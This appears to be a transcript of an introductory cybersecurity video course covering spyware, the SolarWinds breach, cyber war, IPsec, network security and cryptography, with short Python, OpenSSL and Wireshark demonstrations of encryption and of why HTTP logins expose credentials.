The primary issue with being affected by spyware, as a victim, is detection. Unlike crypto miners and Trojans, spying services usually do not demand many system resources, which makes them tough to detect after they have been activated. Since many devices slow down after a couple of years, any performance hit caused by such spyware is often attributed by users to poor software longevity, and they do not check meticulously for other causes of the slowdown. When left unchecked, these devices can capture voice and video from the phone's sensors while keeping the owner in the dark.
Let's take a moment to check whether you are well aware of the causes of such attacks. How do users fall prey to such spyware programs: (a) by installing untested software, (b) by clicking third-party links from emails and messages, (c) by not keeping their apps and phones updated, or (d) all of the above?

But what about the unaffected, still-vulnerable devices? While we cannot be certain of our security, there are a few things we can do to bolster a device, be it against Pegasus or the next big spyware on the market. Say we are safe now and have the time to take the necessary steps to prevent a spyware attack; what can we do? The primary goal must always be to keep our apps and operating system updated with the latest security patches. The vulnerabilities that exploits target are often discovered by developers from Google and Apple, who ship security patches quickly; this can be done for individual apps as well, so keeping them updated is of the utmost importance. While even the most secure devices have fallen prey to Pegasus, a security patch from developers may help minimize the damage at a later stage, or perhaps negate the entire spyware platform altogether. Another big factor in the spread of malware is the trend of sideloading Android applications using APK files: apps downloaded from third-party websites go through no security checks and are mostly responsible for adware and spyware invasions on user devices, so avoiding sideloading would be a major step in protecting yourself. We also often receive spam emails or texts on social media from people we may not know, accompanied by links that allow malware to creep into our device; we should stick to trusted websites and not click on links that redirect us to unknown domains.

Spyware is a controversial segment in governance. While the ramifications are pretty extreme in theory, it severely impacts user privacy; against authoritarian regimes, sufficient resources and a contingency plan can alter the false veil of democracy altogether. Even if our daily life is rather simplistic, we must understand that privacy is not about what we have to hide: it portrays the things we have to protect, and it stands for everything we choose to share with the outside world, both rhetorically and literally.

Now let's look at a hack that took the world by storm and affected multiple governments and corporations: the SolarWinds attack. Global statistics indicate that upward of 18,000 customers were affected, potentially needing billions to recover the losses incurred. The date is December 8th, 2020. FireEye, a global leader among companies specializing in cyber security, released a blog post that caught the attention of the entire IT community: a piece of software known as Orion, developed by SolarWinds Inc., had become the victim of a remote-access Trojan, or RAT. The breach was estimated to have been running since the spring of 2020 and went virtually unnoticed for months. The reveal sent the developers of the Orion software into a frenzy as they quickly released a couple of hotfixes for their platform in order to mitigate the threat and prevent further damage.

But how did this come into existence? We first need to understand the platform that was responsible for the breach. SolarWinds, a software company based in Texas, United States, had developed a management platform known as Orion, catering to corporations and governments worldwide.
Orion was responsible for the monitoring and management of IT administration; this included managing client servers, virtualization components, and even the network infrastructure of the organizations that bought the platform. SolarWinds claims more than 300,000 clients, including US government agencies and several Fortune 500 companies.

This entire chain can be classified as a supply-chain attack. In this variant of cyber crime, hackers target relatively weaker links in an organization's chain of control and delivery, preferably services rendered by a third party, since the organization has no direct jurisdiction over them. In this case the Orion platform was the primary target, and the culprit was software updates. The update server for SolarWinds Orion carried a malicious version with malware attached, a Trojan to be precise. This was made possible because the code repository that handled the software updates was breached: once the update repository was compromised, the source code of the applications became open to modification, and malicious code found its way into the software. The remote-access Trojan was attached to an update nicknamed the Sunburst update, which gave hackers backdoor access to any client running the affected version. On its release, many clients believed the update to be legitimate, since it came from the right source and they had no reason to believe otherwise.

American government agencies were supposedly hit the hardest, as the list of victims included the US Departments of Homeland Security, Treasury, and Health; several private companies like Cisco, Nvidia, and Intel were also compromised, according to a list published by the cyber security firm TrueSec. Most of the companies issued quick updates to fix the vulnerabilities introduced by the software. While the actual perpetrators have never been found, it is believed this was an act of cross-border corporate espionage conducted by state-sponsored hackers, either from Russia or China.

Before we move forward, a quick recap of what we learned: what category of malware was responsible for the SolarWinds hack, a virus, a remote-access Trojan, a spyware, or a worm?

Coming to possible reparations, the Biden government launched a full investigation into the effects and repercussions of the breach. Meanwhile, there are a couple of things that we as consumers must always attend to when working our way through the worldwide web. Using a password manager is highly recommended, as it can generate secure alphanumeric passwords; you should also use different passwords for different accounts, reducing the chance of a single point of failure should one of those accounts get breached. Two-factor authentication applications are also encouraged, since they act as a safety net if hackers get hold of our credentials directly. Clicking unknown links sent via email is a strict no, as is installing applications from unverified sources.

The SolarWinds hack is estimated to cost the parent company nearly $18 million in reparations, making it one of, if not the, biggest hacks in cyberspace history. As recently as July 2021, the hackers accessed some US attorneys' Microsoft 365 email accounts as part of the attack. Agencies like the FBI and CIA are determined to figure out the culprits responsible for this debacle; however, the intricacy and full extent of the breach make that a far more complicated job than it looks on paper.
The date is 26th February 2022, and the world is hit with breaking news that Russian state TV channels have been hacked by Anonymous, a hacktivist collective and movement that has made a name for itself taking part in multiple cyber wars over the past decade. This was in response to the Russian aggression on Ukrainian territory in the hopes of annexation. Anonymous hacked the Russian state TV networks to combat propaganda in Russia and highlight the damage to life meted out by the Kremlin in Ukraine. They also leaked the personal information of 120,000 Russian troops and hacked the Russian central bank, stealing 35,000 files. This served as a clear indicator of how cyber war can change the momentum of a battle, something people had never seen so closely.

So what is cyber war? A digital assault, or a series of strikes or hacks against a country, is sometimes referred to as cyber war. It has the ability to cause havoc on government and civilian infrastructure, as well as disrupt essential systems, causing harm to the state and even death. In this day and age the internet plays a bigger role than just watching videos and learning content: it is where your personal data lives and where you carry out financial transactions. So, rather than resorting to physical violence, cyber war has become the new means to cause havoc, considering the vulnerability of the data passing through the internet. In most circumstances, cyber warfare involves one nation-state attacking another; in certain cases, the assaults are carried out by terrorist organizations or non-state actors pursuing a hostile nation's aims. In June 2021, Chinese hackers targeted organizations like Verizon to secure remote access to their networks. Stuxnet was a computer worm designed to attack Iran's nuclear facilities that evolved and expanded to many other industrial and energy-producing sites in 2010. Since the definition of cyber war is so vague, applying rules and sanctions based on digital assault is even tougher, making the field of cyber warfare a lawless land, bound by no rules or policies.

There are multiple ways these attacks can be carried out. A major category of cyber attack is espionage, which entails monitoring other countries to steal critical secrets; this might include compromising vulnerable computer systems with botnets or spear-phishing attempts before extracting sensitive data. The next weapon in cyber war is sabotage: government agencies must identify their sensitive data and the dangers if it is exploited, because hostile countries or terrorists can use insider threats, such as disgruntled or irresponsible personnel, or government staff with ties to the attacking country, to steal or destroy information. And by overwhelming a website with bogus requests and forcing it to handle them, denial-of-service attacks prevent real users from accessing it; attacking parties may use this form of assault to disrupt key operations and systems and to cut off citizens, military and security officials, and research organizations from sensitive websites.

But what benefits does cyber war offer in contrast to traditional physical warfare? The most important advantage is the ability to conduct attacks from anywhere on the globe without having to travel thousands of miles; as long as the attacker and the target are connected to the internet, organizing and launching a cyber war is relatively less tedious than physical warfare. People living in or fighting for a country can be subjected to propaganda attacks in an attempt to manipulate their emotions and thoughts. And digital infrastructure is highly crucial in today's modern world, from communication channels to secure storage servers, so crippling a country's footprint and control over the internet is very damaging.
But what are some of the ways we as citizens can protect ourselves in the case of a cyber war? In the unfortunate event that your country is involved in warfare, be sure to fact-check every piece of information and follow only trusted sources during that window of time; even conversations online should be limited to a need-to-know basis, considering propaganda campaigns have the power to drastically influence the tide of war. It is highly crucial to follow basic security guidelines to secure our devices, like regularly updating our operating systems and occasionally running full-system antivirus scans. If your country or organization is being attacked, keeping devices segregated on a network goes a long way in bolstering security. And try to avoid sharing a lot of personal data online: in this era of Instagram and Facebook, divulging private information can be detrimental to keeping a secure firewall around your data, because the more information an attacker has access to, the higher the chances of devising a plan to infiltrate your defenses.

During data transmission, various external factors can affect the transfer of data over a network channel. To prevent such cases, we use Internet Protocol Security, which we'll discuss in this session on IPsec, explained step by step. The agenda: to begin, we look at what IPsec is; we continue with why we use IPsec in a network, followed by the components of IPsec and the modes of IP security; and as the last topic, we look at the working steps involved in IP security.

Let's begin with the first heading: what is IPsec? IPsec (Internet Protocol Security) is defined as a set of frameworks and protocols to secure data transmission over a network. The protocol was initially defined around two main protocols for data security over a network channel: the Authentication Header, which is responsible for data integrity and anti-replay services, and the second protocol, Encapsulating Security Payload (ESP for short), which provides data encryption and data authentication.

Now, why do we use IPsec in a network? IPsec is used to secure sensitive data and information, such as company data, clinical data, bank data, and other sensitive information belonging to an institution, while it is transmitted over a network channel. VPNs (virtual private networks) apply IPsec protocols to encrypt data for end-to-end transmission. IPsec is also used to encrypt application-layer data in the OSI model and to provide security for data shared over network routers, along with data authentication.
Let's take a look at the working of IPsec services. To begin, we have two systems, system one and system two, which establish a network channel; encryption of the data takes place when one host shares data with the second host. During this, IPsec services secure the data being transferred over the network channel by applying encryption and authentication at the routers.

Now let's move on to the next topic: the components of IPsec. IPsec comprises multiple protocols that secure data transmission over the network channel. The first is the Encapsulating Security Payload protocol, ESP for short. This IPsec protocol provides data encryption and authentication services, authenticating and encrypting the data packets in the transmission channel. Moving on, we have the Authentication Header, AH for short. Similar to ESP, the Authentication Header provides security services, but it does not encrypt the data; it protects the IP packet by adding an additional header to it, so the modified IP datagram carries the authentication header alongside the original IP components, providing data authentication over the network channel. Then we have Internet Key Exchange, IKE. This protocol provides protection for the content and also transforms the attributes of the original data to be shared, implementing SHA and MD5 algorithms; messages are checked for authentication and only then forwarded to the receiver side. For example, the original packet we are used to consists of an IP header, TCP/UDP, and data, whereas the modified IPsec packet has an ESP header added between the IP header and the TCP portion.

Now let's move on to the modes of IPsec. There are basically two IPsec modes available for data transmission over a network channel. The first is tunnel mode. This mode of transmission is used to secure gateway-to-gateway traffic; it applies when the data's final destination connects to the sender's site through gateways over the internet. For example, with two hosts, host A and host B, a message sent from host A to host B passes through a gateway at host A's side and then through another gateway to reach host B; this is the basic format for gateway-to-gateway data transmission, and a corresponding IP datagram format is used for tunnel mode. The second mode is transport mode. This mode of IPsec is used to protect protocols like TCP or UDP and to secure end-to-end communication; unlike tunnel mode, transport mode adds the Authentication Header and Encapsulating Security Payload for security within the original IP packet. In the modified IP datagram for transport mode, the point to note is that the IPsec header is always added between the IP header and the TCP header.
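To make the authentication service concrete, here is a toy illustration (not real IPsec) of the integrity check that AH and ESP provide: the sender computes a keyed hash over the packet contents with a key of the kind IKE would negotiate, and the receiver recomputes it to detect tampering.

```python
# A toy illustration of IPsec-style data authentication, not an IPsec
# implementation: an HMAC "integrity check value" over packet contents.
import hashlib, hmac, os

shared_key = os.urandom(32)            # stands in for the IKE-negotiated key
packet = b"IP payload to be protected"

# Sender: compute the integrity check value (ICV) and send it with the packet.
icv = hmac.new(shared_key, packet, hashlib.sha256).digest()

# Receiver: recompute the ICV and compare in constant time; any change to
# the packet in transit makes the comparison fail.
ok = hmac.compare_digest(icv, hmac.new(shared_key, packet, hashlib.sha256).digest())
print("packet authentic:", ok)
```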
Now let's move on to the last heading for this session on IPsec: the working steps involved in IP security. In general, there are five steps in the working of IPsec to secure data transmission over a network channel. The first step is host recognition: the host system checks whether a packet is to be transmitted with protection by automatically triggering the security policy for the data, implemented on the sender's side for proper encryption. The second step is IKE phase one: the two host devices, the sender and the receiver, authenticate each other to establish a secure network channel. It comprises two modes: main mode, which provides much better security with a proper time limit, and aggressive mode, which, as the name suggests, establishes the IPsec connection much faster than main mode. The third step is IKE phase two: after the second step, the hosts decide the type of cryptographic algorithm to apply to the session on the network channel, along with the secret key the algorithm will use to encrypt the data for transmission. Then we have IPsec transmission: this step involves the actual transfer of data over the network channel using the various protocols of IPsec security, implemented under the tunnel arrangement. And the last step is IPsec termination: after the data exchange completes or the session times out, the IPsec tunnel is terminated and the security keys that were established are discarded by both host systems.

Network security is a set of technologies that protects the usability and integrity of a company's infrastructure by preventing the entry or proliferation of threats within a network. Its architecture comprises tools that protect the network itself and the applications that run over it. Effective network security strategies employ multiple lines of defense that are scalable and automated; each defensive layer enforces a set of security policies determined beforehand by the administrator, with the aim of securing the confidentiality and accessibility of the data and the network. Every company or organization that handles a large amount of data has some degree of defense against cyber threats; the most basic example of network security is the password protection a user chooses for their network. Recently, network security has become the central topic of cyber security, with many organizations inviting applications from people with skills in this area. It is crucial for both personal and professional networks: most houses with high-speed internet have one or more wireless routers, which can be vulnerable to attack if they are not adequately secured. The risk of data loss, theft, and sabotage may be decreased with a strong network security system. Workstations are protected from hazardous spyware thanks to network security; additionally, it guarantees the security of data shared over a network by dividing the information into sections, encrypting those portions, and transferring them over separate pathways. Network security infrastructure offers multiple levels of protection to thwart man-in-the-middle attacks, preventing situations like eavesdropping, among other harmful attacks. This is becoming increasingly difficult in today's hyperconnected environment, as more corporate applications migrate to both public and private clouds, and as modern applications are frequently virtualized and dispersed across several locations, some outside the physical control of the IT team. Network traffic and infrastructure must be protected in these cases, since assaults on businesses are increasing every single day.

We have now covered the basics of network security, but we need to understand how it works in slightly more detail. Network security revolves around two processes: authentication and authorization. The first process, authentication, is similar to an access pass that ensures only those who have the right to enter a building can do so.
In other words, authentication checks and verifies that it is indeed a user belonging to the network who is trying to access or enter it, thereby preventing unauthorized intrusions. Next comes authorization. This process decides the level of access provided to the recently authenticated user: a network admin needs access to the entire network, whereas those working within it probably need access only to certain areas. The process of determining the level of access, or permission level, based on a network user's role is known as authorization.

Today's network architecture is complex, and it faces a threat environment that is always changing, with attackers always trying to find and exploit vulnerabilities. These vulnerabilities can exist in many areas, including devices, data, applications, users, and locations. For this reason, many network security management tools and applications are in use today that address individual threats. When just a few minutes of downtime can cause widespread disruption and massive damage to an organization's bottom line and reputation, it is essential that these protection measures are in place beforehand.

Now that you know a little about network security and its working, let's cover the different types of network security. The fundamental tenet of network security is the layering of protection for massive networks and stored data, ensuring the acceptance of rules and regulations as a whole. There are three types: physical, technical, and administrative. Physical security is the most basic level: it prevents unauthorized personnel from acquiring control over the confidentiality of the network, including external peripherals and routers that might be used for cable connections, and it can be achieved with devices like biometric systems. Physical security is critical especially for small businesses that, as opposed to large firms, do not have many resources to devote to security personnel and tools. Technical network security focuses mostly on safeguarding data that is either kept in the network or in transit across it; it fulfills two functions, defense against unauthorized users and defense against malicious actions. The last category is administrative: this level of network security governs user behavior, such as how permissions are granted and how the authorization process takes place. It also ensures the level of sophistication the network might need to protect itself against all the attacks, and it suggests necessary amendments to the infrastructure.

Those are the basics we need to cover on network security; next we'll go through two mediums of network security, the transport layer and the application layer. Transport-layer security (TLS) is a way to secure information as it is carried over the internet while users browse websites, email, instant messaging, and so on. TLS aims to provide a private and secure connection between a web browser and a website server. It does this with a cryptographic handshake between the two systems using public-key cryptography: the two parties open the connection and exchange a secret token, and once each machine validates this token, it is used for all communications. The connection then employs lighter symmetric cryptography to save bandwidth and processing power.
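As a quick illustration of transport-layer security in practice, here is a minimal sketch using Python's standard ssl module to open a TLS-protected connection; the host name is just an example.

```python
# A minimal sketch of a TLS connection using Python's standard library.
import socket
import ssl

context = ssl.create_default_context()   # verifies server certificates by default

with socket.create_connection(("www.wikipedia.org", 443)) as raw_sock:
    with context.wrap_socket(raw_sock, server_hostname="www.wikipedia.org") as tls:
        # The cryptographic handshake has completed; traffic is now encrypted
        # with the negotiated symmetric cipher.
        print(tls.version())   # e.g. 'TLSv1.3'
        print(tls.cipher())    # the negotiated cipher suite
```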
Since the application layer is the closest layer to the end user, it provides hackers with the largest threat surface. Poor app-layer security can lead to performance and stability issues, data theft, and in some cases the network being taken down. Examples of application-layer attacks include distributed denial-of-service (DDoS) attacks, HTTP floods, SQL injections, cross-site scripting, and more. Most organizations have an arsenal of application-layer security protections to combat these and others, such as web application firewalls and secure web gateway services.

Now that the theory behind network security has been covered in detail, let's go through some of the tools that can be used to enforce these network security policies. The first tool in this section is the firewall: a network security device that keeps track of incoming and outgoing network traffic and decides which traffic to allow or deny in accordance with a set of security rules. For more than 25 years, firewalls have served as network security's first line of defense, providing a barrier between trustworthy internal, protected, and regulated networks and shady external networks like the internet. The next tool that can bolster network security is a virtual private network, or VPN for short: an encrypted connection between a device and a network via the internet. The encrypted connection aids the secure transmission of sensitive data, makes it impossible for unauthorized parties to eavesdrop on the traffic, and enables remote work for the user. VPN technology is common in both corporate and personal networks. Next comes the intrusion prevention system, or IPS: a network security tool that continually scans a network for harmful activity and responds when it occurs by reporting, blocking, or discarding it. It can be either hardware or software, and it is more sophisticated than an intrusion detection system (IDS) framework, which merely identifies harmful activity and warns an administrator; an IPS actually takes action against that activity. The final tool in this section is behavioral analytics, which focuses on the statistics carried over and stored through months and years of usage; once a pattern resembling a known kind of attack is noticed, the IT administrator can detect the attack, stop similar ones, and further enhance security.

Now that we have covered network security, the tools it requires, its types, and so on, let's go through its benefits. The first is protection against external threats. The objectives of cyber assaults can be as varied as the attackers themselves, although they are typically initiated for financial gain. Whether they are industrial spies, activists, or cyber criminals, these bad actors all have one thing in common: how quick, clever, and covert their attacks are getting. A strong cyber security posture that includes routine software updates can help firms identify and respond to the abuse techniques, tools, and common entry points. The next benefit is protection against internal threats. The human element continues to be the cyber security system's weakest link: insider risk can originate from current or former workers, third-party vendors, or even trusted partners, and it can be unintentional, careless, or downright malicious.
Aside from that, the rapid expansion of remote work, personal devices used for business purposes, and even IoT devices in remote locations can make it easier for these kinds of threats to go undetected until it's too late. However, by proactively monitoring networks and managing access, these dangers can be identified and dealt with before they become expensive disasters. The third benefit is increased productivity. It is nearly impossible for employees to function when networks and personal devices are slowed to a crawl by viruses and other cyber attacks while a website operates and the company runs. By implementing various cyber security measures, such as enhanced firewalls, virus scanning, and automatic backups, you can significantly minimize violations and the downtime required to fix a breach. Education and training can also help employees identify potential email phishing schemes, suspicious links, and other malicious criminal activity. Another benefit is brand trust and reputation. Customer retention is one of the most crucial elements in business development, and customers today place a premium on maintaining brand loyalty through a strong cyber security stance, since this is the fastest way to win business back, get referrals, and sell more overall. It also helps manufacturers get onto the vendor lists of bigger companies as part of a supply chain, which is only as strong as its weakest link; this opens possibilities for potential future endeavors and development.

With the rise in censorship and general fear over privacy loss, consumer security is at an all-time-high risk. Technology has made our lives so much easier while painting a sizable target on our personal information, so it is necessary to understand how to safeguard our data while staying up to date with the latest technological developments. Maintaining this balance has become easier with cryptography taking its place in today's digital world.

Here's a story to help you understand cryptography. Meet Anne. She wanted a decent discount on the latest iPhone, started searching on the internet, and found a rather shady website offering a 50% discount on the first purchase. Once Anne submitted her payment details, a huge chunk of money was withdrawn from her bank account just moments after. Devastated, Anne quickly realized she had failed to notice that the website was an HTTP web page instead of an HTTPS one: the payment information she submitted was not encrypted, and it was visible to anyone keeping an eye, including the website owner and hackers. Had she used a reputable website, which encrypts transactions and employs cryptography, our iPhone enthusiast could have avoided this particular incident. This is why it is never recommended to visit unknown websites or share any personal information on them.

Now that we understand why cryptography is so important, here are the topics to be covered: we take a look at what cryptography is and how it works; we learn where cryptography is used in our daily lives and how we benefit from it; then we cover the different types of cryptography and their respective uses; and, moving on, we look at the usage of cryptography in ancient history and a live demonstration of cryptography and encryption in action.
action let’s now understand what cryptography is cryptography is the science of encrypting or decrypting information to prevent unauthorized access we transform our data and personal information so that only the correct recipient can understand the message as an essential aspect of modern data security using cryptography allows the secure storage and transmission of data between willing parties encryption is the primary route for employing cryptography by adding certain algorithms to jumble up the data decryption is the process of reversing the work done by encrypting information so that the data becomes readable again both of these methods form the basis of cryptography for example when simply learn is jumbled up or changed in any format not many people can guess the original word by looking at the encrypted text the only ones who can are the people who know how to decrypt the coded word thereby reversing the process of encryption any data pre- encryption is called plain text or clear text to encrypt the message we use certain algorithms that serve a single purpose of scrambling the data to make them unreadable without the necessary tools these algorithms are called ciphers they are a set of detailed steps to be carried out one after the other to make sure the data becomes as unreadable as possible until it reaches the receiver we take the plain text pass it to the cipher algorithm and get the encrypted data this encrypted text is called the cipher text and this is the message that is transferred between the two parties the key that is being used to scramble the data is known as the encryption key these steps that is the cipher and the encryption key are made known to the receiver who can then reverse the encryption on receiving the message unless any third party manages to find out both the algorithm and the secret key that is being used they cannot decrypt the messages since both of them are necessary to unlock the hidden content wonder what else we would lose if not for cryptography any website where you have an account can read your passwords important emails can be intercepted and their contents can be read without encryption during the transit more than 65 billion messages are sent on WhatsApp every day all of which are secured thanks to end-to-end encryption there is a huge market opening up for cryptocurrency which is possible due to blockchain technology that uses encryption algorithms and hashing functions to ensure that the data is secure if this is of particular interest to you you can watch our video on blockchain the link of which will be in the description of course there is no single solution to a problem as diverse as explained there are three variants of how cryptography works and is in practice they are symmetric encryption asymmetric encryption and hashing let’s find out how much we have understood until now do you remember the difference between a cipher and cipher text leave your answers in the comments and before we proceed if you find this video interesting make sure to give it a thumbs up before moving ahead let’s look at symmetric encryption first symmetric encryption uses a single key for both the encryption and decryption of data it is comparatively less secure than asymmetric encryption but much faster it is a compromise that has to be embraced in order to deliver data as fast as possible without leaving information completely vulnerable this type of encryption is used when data rests on servers and identifies personnel for payment applications and services 
The potential drawback of symmetric encryption is that both the sender and receiver need to have the same secret key, and it must be kept hidden at all times. The Caesar cipher and the Enigma machine are both symmetric encryption examples that we will look into further on. For example, if Alice wants to send a message to Bob, she can apply a substitution or shift cipher to encrypt the message, but Bob must be aware of the same key so that he can decrypt it whenever he finds it necessary to read the full message.

Symmetric encryption uses one of two types of ciphers: stream ciphers and block ciphers. Block ciphers break the plain text into blocks of fixed size and use the key to convert them into cipher text; stream ciphers convert the plain text into cipher text one bit at a time instead of breaking it up into bigger chunks. In today's world, the most widely used symmetric encryption algorithm is AES-256, which stands for Advanced Encryption Standard with a key size of 256 bits (128-bit and 192-bit key sizes are also available). Older algorithms, like the Data Encryption Standard (DES), the Triple Data Encryption Standard (3DES), and Blowfish, have all fallen out of favor due to the rise of AES. AES chops the data into blocks and performs ten or more rounds of obscuring and substituting the message to make it unreadable.

Asymmetric encryption, on the other hand, has a double whammy at its disposal: there are two different keys at play, a public key and a private key. The public key is used to encrypt information pre-transit, and the private key is used to decrypt the information post-transit. If Alice wants to communicate with Bob using asymmetric encryption, she encrypts the message using Bob's public key; after receiving the message, Bob uses his own private key to decrypt the data. This way, nobody can intercept the message in transit, and there is no need for any secure key exchange, since the encryption is done with a public key and the decryption with a private key that no one except Bob has access to; both keys are necessary to read the full message. There is also a reverse scenario, where we use the private key for encryption and the public key for decryption: a server can sign non-confidential information using its private key, and anyone who has its public key can decrypt the message. This mechanism also proves the sender is authentic and there is no problem with the origin of the information. RSA encryption is the most widely used asymmetric encryption standard. It is named after its founders, Rivest, Shamir, and Adleman, and it uses block ciphers that separate the data into blocks and obscure the information. Widely considered the most secure form of encryption, albeit relatively slower than AES, it is widely used in web browsing, secure identification, VPNs, email, and chat applications.

With so much hanging on the key's secrecy, there must be a way to transmit keys without others reading our private data. Many systems use a combination of symmetric and asymmetric encryption to bolster security and preserve speed at the same time: since asymmetric encryption takes longer to decrypt large amounts of data, the full information is encrypted using a single key (symmetric encryption), and that single key is then transmitted to the receiver using asymmetric encryption, so you don't have to compromise either way. Another route is the Diffie-Hellman key exchange, which relies on a one-way function and is much tougher to break into.
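Here is a short sketch contrasting the two approaches just described, assuming the third-party cryptography package (pip install cryptography): one shared AES-256 key for the symmetric case, and an RSA key pair where the public key encrypts and only the private key decrypts.

```python
# A sketch of symmetric (AES-256-GCM) vs. asymmetric (RSA-OAEP) encryption,
# assuming the third-party 'cryptography' package.
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# Symmetric: the same 256-bit key both encrypts and decrypts.
key = AESGCM.generate_key(bit_length=256)
nonce = os.urandom(12)                               # must be unique per message
ct = AESGCM(key).encrypt(nonce, b"simplilearn", None)
assert AESGCM(key).decrypt(nonce, ct, None) == b"simplilearn"

# Asymmetric: Bob's public key encrypts; only Bob's private key decrypts.
bob_private = rsa.generate_private_key(public_exponent=65537, key_size=2048)
oaep = padding.OAEP(mgf=padding.MGF1(hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
ct2 = bob_private.public_key().encrypt(b"simplilearn", oaep)
assert bob_private.decrypt(ct2, oaep) == b"simplilearn"
```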
The third variant of cryptography is hashing. Hashing is the process of scrambling a piece of data beyond recognition. It gives an output of fixed size, known as the hash value of the original data, or just the hash in general. The calculations that do the job of messing up the data constitute the hash function. Hashes are generally not reversible without resilient brute-force mechanisms, and they are very helpful for data stored on website servers that need not be kept in plain text. For example, many websites store your account password in a hashed format so that not even the administrator can read your credentials; when a user tries to log in, the entered password's hash value is compared with the hash value already stored on the server for authentication, since the function will always return the same value for the same input.
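A minimal sketch of the password-storage pattern just described, using Python's standard hashlib; the salt is an addition real systems make so that identical passwords don't produce identical hashes.

```python
# A minimal sketch of hashed password storage with Python's standard library.
import hashlib, hmac, os

def hash_password(password: str, salt: bytes) -> bytes:
    # A slow, salted hash; the same input always yields the same output.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

salt = os.urandom(16)
stored_hash = hash_password("hunter2", salt)    # what the server stores

# At login, recompute the hash of the entered password and compare.
attempt = hash_password("hunter2", salt)
print("login ok:", hmac.compare_digest(stored_hash, attempt))
```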
These two keys are mathematically linked with each other; they cannot be substituted with any other key, and in order to encrypt the original message or decrypt the cipher text, this pair must be kept together. The public key is then sent to the sender, and the receiver keeps the private key with himself.

In this scenario, let's try to encrypt the words "simply learn." We have to select whether the key being used for encryption is private or public, since that affects the process of scrambling the information. Since we are using the public key here, let's select the same, copy it, and paste it over here. The cipher we are using right now is plain RSA; there are some modified ciphers, with their own pros and cons, that can also be used, depending on the use case. Once we click on encrypt, we can see the cipher text being generated. The pseudo-random generating functions are designed so that a single character change in the plain text will trigger a completely different cipher text; this is a security feature that strengthens the process against brute-force methods.

Now that we are done with the encryption process, let's take a look at the decryption part. The receiver gets this cipher text from the sender with no other key or supplement; he or she must already possess the private key generated from the same pair. No other private key can be used to decrypt the message, since the two are mathematically linked. We paste the private key here and select the same. The cipher must also be the same one used during the encryption process. Once we click decrypt, you can see the original plain text we had decided to encrypt. This sums up the entire process of RSA encryption and decryption.

Now, some people use it the other way around: we also have the option of using the private key to encrypt information and the public key to decrypt it. This is done mostly to validate the origin of the message, since the keys only work in pairs. If a different private key is used to encrypt the message, the public key cannot decrypt it; conversely, if the public key is able to decrypt the message, it must have been encrypted with the right private key, and hence by the rightful owner. Here we just take the private key, use it to encrypt the plain text, and select the same in this checkbox as well. You can see we have generated a completely new cipher text. This cipher text will be sent to the receiver, and this time we will use the public key for decryption. Let's select the correct checkbox and decrypt, and we still get the same output.

Now let's take a look at a practical example of encryption in the real world. We all use the internet on a daily basis, and many are aware of the implications of using unsafe websites. Let's take a look at Wikipedia, a pretty standard HTTPS website, where the S stands for secure, and see how it secures our data. Wireshark is the world's foremost and most widely used network protocol analyzer; it lets you see what's happening on your network at a microscopic level, and we are going to use it to watch the traffic leaving our machine and understand how vulnerable it is. Since there are many applications running on this machine, let's apply a filter that will only show us the results related to Wikipedia, and then search for something we can navigate the website with. Once we get into it a little, you can see some of the requests being populated over here.
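You can reproduce the key pair part of this demo locally with OpenSSL instead of a web tool (a sketch; the file names are arbitrary, and 1024 bits is used only to match the demo, with 2048 or more recommended in practice):

```bash
# Generate a 1024-bit RSA key pair (small, demo-only size)
openssl genrsa -out demo.key.pem 1024
openssl rsa -in demo.key.pem -pubout -out demo.pub.pem

# The public key file is noticeably smaller than the private key file
wc -c demo.pub.pem demo.key.pem

# Encrypt with the public key, decrypt with the matching private key
printf 'simply learn' > msg.txt
openssl pkeyutl -encrypt -pubin -inkey demo.pub.pem -in msg.txt -out msg.enc
openssl pkeyutl -decrypt -inkey demo.key.pem -in msg.enc
```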
Let's take a look at a specific request. These are the data packets that transport the data from our machine to the internet and vice versa. As you can see, there's a bunch of gibberish data here that doesn't really reveal anything we searched or watched. Other secured websites function the same way, and it is very difficult, if at all possible, to snoop on user data this way.

To put this in perspective, let's take a look at another website, which is an HTTP web page. This has no encryption enabled on the server end, which makes it vulnerable to attacks. There is a login form here that needs legitimate user credentials in order to grant access. Let's enter a random pair of credentials; these obviously won't work, but we can see the manner of data transfer. Unsurprisingly, we weren't able to get into the platform, but we can see the data packets. Let's apply a similar filter to understand what requests this website is sending. These are the requests being sent by the HTTP login form to the internet, and if we check here, whatever username and password we entered can easily be seen in Wireshark. We used a dummy pair of credentials, but by selecting the right data packet we could just as easily find real ones; if a website like this asked for payment information or legitimate credentials, it would be very easy to get hold of them. To reiterate what we have already learned: you must always avoid HTTP websites, and unknown or untrustworthy websites in general, because the problem we saw here is just the tip of the iceberg. Even though cryptography has managed to lessen the risk, cyber attacks are still prevalent, and we should always stay alert to keep ourselves safe online.

There are two types of encryption in cryptography: symmetric key cryptography and asymmetric key cryptography. Both categories have their pros and cons and differ only in implementation. Today we are going to focus exclusively on symmetric key cryptography. Let us have a look at its applications in order to understand its importance better. This variant of cryptography is primarily used in banking applications, where personally identifiable information needs to be encrypted. With so many aspects of banking moving onto the internet, having a reliable safety net is crucial: symmetric cryptography helps in detecting bank fraud and boosts the security of payment gateways in general. It is also helpful in protecting data that is not in transit but at rest on servers and in data centers. These centers house massive amounts of data that need to be encrypted with a fast and efficient algorithm, so that when the data needs to be recalled by the respective service, there is an assurance of little to no delay. While browsing the internet, we need symmetric encryption to browse secure HTTPS websites and get all-around protection. It plays a significant role in verifying website server authenticity, exchanging the necessary encryption keys, and generating a session using those keys to ensure maximum security, helping us avoid the rather insecure HTTP website format.

So let us understand how symmetric key cryptography works before moving on to the specific algorithms. Symmetric key cryptography relies on a single key for the encryption and decryption of information. Both the sender and the receiver of the message need to have a pre-shared secret key that they will use to convert the plain text into cipher text and vice versa. As you can see in the image, the key used for encryption is the same key needed for decrypting the message at the other end.
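Here is what that single shared key looks like in practice with OpenSSL (a sketch; the passphrase stands in for the pre-shared secret both sides already hold):

```bash
# Sender: encrypt with the shared secret
printf 'i am ready' | openssl enc -aes-256-cbc -pbkdf2 -salt \
    -pass pass:our-shared-secret -out msg.enc

# Receiver: the SAME secret decrypts it
openssl enc -d -aes-256-cbc -pbkdf2 -pass pass:our-shared-secret -in msg.enc

# A wrong secret fails outright
openssl enc -d -aes-256-cbc -pbkdf2 -pass pass:wrong-guess -in msg.enc || echo "bad key"
```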
